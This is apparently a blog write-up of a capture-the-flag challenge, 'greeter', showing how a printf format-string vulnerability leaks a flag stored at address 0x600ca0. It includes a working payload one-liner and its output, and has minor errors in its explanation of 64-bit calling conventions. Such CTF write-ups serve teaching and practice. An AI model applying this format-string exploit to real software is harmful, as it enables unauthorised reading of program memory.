This program open and read from flag.txt' toward 0x600ca0 address.
how can read it?, if you know fsb, it's so simple.
write the custom address and read them with fsb vulnerability.
ksg@ubuntu:~/pwn/tum$ ./greeter
Hi, what's your name?
%x
Pwn harder, ffffbdc0!
64bit system calling convention is different then 32bit.
32bit operator system calling use stack(esp) ex) esp, esp+4, esp+8, esp+0xc ...
but this system(64bit) calling use register and stack like rdi, rsi, rdx, rsi, r8, r9, rsp, rsp+4, rsp+8.
input value live in rsp so write the "\x0c\xa0\x60\0\0\0\0\0" and execute "%6$s" from printf,
may you get the flag.
One problem remain in this write up, printf function can print till null byte in string.
0x0000000000600ca0 address had null bytes so you cant see anymore.
solve is so simple too.
Write the payload backwards .
ksg@ubuntu:~/pwn/tum$ (python -c 'print " %7$s"+"\x00\x00\x00\x00\x00\x60\x0c\xa0"[::-1]') | ./greeter
Hi, what's your name?
Pwn harder, flag{flagaflasdkflskflskflskflskdl}
?
`!
'Pwnable' 카테고리의 다른 글
| canary leak python code (0) | 2015.11.17 |
|---|---|
| tum ctf 2015 teaser - c0unter (0) | 2015.11.03 |
| strtap address overflow (0) | 2015.10.18 |
| stdin@@GLIBC_2.0 (2) | 2015.10.06 |
| pwnable.kr uaf (0) | 2015.09.29 |